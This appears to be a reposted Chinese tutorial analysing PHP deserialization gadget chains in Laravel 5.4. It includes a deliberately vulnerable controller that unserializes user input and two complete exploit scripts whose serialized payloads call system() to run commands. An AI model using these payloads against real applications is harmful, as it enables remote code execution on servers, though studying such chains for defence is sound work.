laravel5.4反序列化

概述前言laravel是一套简洁、优雅的PHPWeb开发框架(PHPWebFramework)环境搭建laravel5.4部署composercreate-projectlaravel/laravel=5.4laravel5-4--prefer-distcdlaravel5-4phpartisanserve访问http://127.0.0.1:8000添加路由routes/web.phpRoute::get('/seri 前言

laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)

环境搭建laravel5.4部署

composer create-project laravel/laravel=5.4 laravel5-4 --prefer-distcd laravel5-4PHP artisan serve

访问http://127.0.0.1:8000

添加路由
routes/web.PHP

Route::get('/seri', "SeriController@seri");

添加控制器
app/http/Controllers/SeriController.PHP

<?PHPnamespace App\http\Controllers;class SeriController extends Controller{    public function seri()    {        if (isset($_GET['code'])){            $code = $_GET['code'];            unserialize($code);        }        else{            highlight_file(__file__);        }        return "The laravel version is 5.4!";    }}?>

访问路径
http://127.0.0.1:8000/seri

漏洞分析找__destruct()方法

src/Illuminate/broadcasting/Pendingbroadcast.PHP

这里$this->events和$this->event都是可控的

找可利用的__call()方法Generator.PHP

src/Faker/Generator.PHP

分析

查找format()方法

$arguments就是我们传入的可控参数，$this->getFormatter($formatter)返回system时可 rce
查看getFormatter()方法

这里$this->formatters可控
直接返回$this->formatters[$formatter]，而$formatter就是dispatch
所以可以构造$this->formatters = ['dispatch' => 'system']可以满足要求

复现

//exp_1.PHP<?PHPnamespace Illuminate\broadcasting{	use Faker\Generator;	class Pendingbroadcast	{		protected $events;		protected $event;		public function __construct($cmd)		{			$this->event = $cmd;			$this->events = new Generator;		}	}	$seri = new Pendingbroadcast('whoami');	echo base64_encode(serialize($seri));}namespace Faker{	class Generator	{		protected $formatters = array();		public function __construct()		{			$this->formatters = array('dispatch' => 'system');		}	}}?>

但是提交时报错

原因在于Pendingbroadcast.PHP存在__wake()方法

注释掉该方法继续执行

成功执行命令

Manager.PHP

src/Illuminate/Support/Manager.PHP

分析

进入driver()方法

先查看createDriver()方法

在 callCustomCreator()方法中是一个可变函数
而且$this->customCreators和$this->app可控制

返回看$driver怎么来的

getDefaultDriver()方法是一个 abstract 抽象方法，需要找它的继承子类重写

转到ChannelManager.PHP文件
src/Illuminate/Notifications/ChannelManager.PHP

查看getDefaultDriver()方法
这时候就可以令$driver可控了

最后只要令$this->customCreators[$driver] = 'system'|$this->app = 'whoami'即可执行命令

复现

//exp_2.PHP<?PHPnamespace Illuminate\broadcasting{	use Illuminate\Notifications\ChannelManager;	class Pendingbroadcast	{		protected $events;		public function __construct($cmd)		{			$this->events = new ChannelManager($cmd);		}	}	$seri = new Pendingbroadcast('whoami');	echo base64_encode(serialize($seri));}namespace Illuminate\Notifications{	class ChannelManager	{		protected $app;		protected $defaultChannel;		protected $customCreators;		public function __construct($cmd)		{			$this->defaultChannel = 'shivers';			$this->customCreators = array('shivers' => 'system'); 			$this->app = $cmd;		}	}}?>

可以执行命令

参考

https://xz.aliyun.com/t/9478

总结

以上是内存溢出为你收集整理的laravel5.4反序列化全部内容，希望文章能够帮你解决laravel5.4反序列化所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错，欢迎将内存溢出网站推荐给程序员好友。